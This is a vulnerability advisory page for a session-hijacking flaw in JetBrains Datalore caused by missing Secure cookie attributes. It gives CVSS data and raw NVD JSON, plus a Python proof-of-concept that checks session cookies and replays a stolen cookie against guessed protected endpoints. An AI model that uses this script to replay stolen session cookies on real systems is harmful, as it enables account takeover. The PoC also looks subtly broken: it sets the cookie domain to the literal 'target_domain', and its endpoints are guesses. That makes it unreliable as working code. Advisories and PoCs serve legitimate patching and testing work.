Security Vulnerability Report
中文
CVE-2026-32745 CVSS 6.3 MEDIUM

CVE-2026-32745

Published: 2026-03-13 19:55:10
Last Modified: 2026-04-02 14:55:22
Source: [email protected]

Description

In JetBrains Datalore before 2026.1 session hijacking was possible due to missing secure attribute for cookie settings

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:jetbrains:datalore:*:*:*:*:*:*:*:* - VULNERABLE
JetBrains Datalore < 2026.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-32745 PoC - JetBrains Datalore Session Hijacking # This PoC demonstrates the session hijacking vulnerability due to missing Secure cookie attribute import requests import argparse from http.cookiejar import CookieJar import urllib.parse def check_cookie_security(url): """ Check if the Datalore application sets cookies without Secure attribute """ session = requests.Session() response = session.get(url) print(f"[*] Checking cookie settings for: {url}") print(f"[*] Response status: {response.status_code}") # Check for JSESSIONID or other session cookies session_cookies = ['JSESSIONID', 'SESSION', 'SESSIONID', 'PHPSESSID'] vulnerable_cookies = [] for cookie in session.cookies: print(f"\n[+] Cookie Name: {cookie.name}") print(f"[+] Cookie Value: {cookie.value[:20]}...") print(f"[+] Cookie Domain: {cookie.domain}") print(f"[+] Cookie Secure Flag: {cookie.has_nonstandard_attr('Secure') or cookie.secure}") # Check if it's a session cookie without Secure flag if any(session_name.lower() in cookie.name.lower() for session_name in session_cookies): if not cookie.secure: vulnerable_cookies.append(cookie.name) print(f"[!] VULNERABLE: {cookie.name} is missing Secure attribute!") return vulnerable_cookies def simulate_session_hijacking(target_url, cookie_name, cookie_value): """ Simulate session hijacking by using stolen cookie """ print(f"\n[*] Simulating session hijacking...") # Create a new session with the stolen cookie hijacked_session = requests.Session() hijacked_session.cookies.set(cookie_name, cookie_value, domain='target_domain') # Try to access protected resources protected_endpoints = [ '/api/user/profile', '/api/workspaces', '/api/computations', '/dashboard' ] for endpoint in protected_endpoints: try: response = hijacked_session.get(target_url + endpoint) if response.status_code == 200: print(f"[+] Successfully accessed: {endpoint}") print(f"[+] Response length: {len(response.content)} bytes") elif response.status_code == 401: print(f"[-] Unauthorized: {endpoint}") else: print(f"[*] Status {response.status_code} for: {endpoint}") except Exception as e: print(f"[!] Error accessing {endpoint}: {str(e)}") def main(): parser = argparse.ArgumentParser(description='CVE-2026-32745 PoC') parser.add_argument('-u', '--url', required=True, help='Target Datalore URL') parser.add_argument('-c', '--cookie', help='Stolen cookie name=value') args = parser.parse_args() # Check for vulnerable cookies vulnerable = check_cookie_security(args.url) if vulnerable: print(f"\n[!] Found {len(vulnerable)} vulnerable session cookie(s)") print("[!] This indicates the application may be vulnerable to session hijacking") print("[!] Attackers on the same network could intercept these cookies via HTTP") else: print("\n[+] No vulnerable cookies detected (or all cookies have Secure flag)") # If cookie provided, simulate hijacking if args.cookie: parts = args.cookie.split('=') if len(parts) == 2: simulate_session_hijacking(args.url, parts[0], parts[1]) if __name__ == '__main__': main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32745", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:55:09.983", "lastModified": "2026-04-02T14:55:21.807", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In JetBrains Datalore before 2026.1 session hijacking was possible due to missing secure attribute for cookie settings"}, {"lang": "es", "value": "En JetBrains Datalore antes de 2026.1 el secuestro de sesión era posible debido a la falta del atributo seguro para la configuración de cookies."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-614"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-319"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jetbrains:datalore:*:*:*:*:*:*:*:*", "versionEndExcluding": "2026.1", "matchCriteriaId": "54F3034A-2ADD-4FE7-8CAD-A70B4FC2F6FF"}]}]}], "references": [{"url": "https://www.jetbrains.com/privacy-security/issues-fixed/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.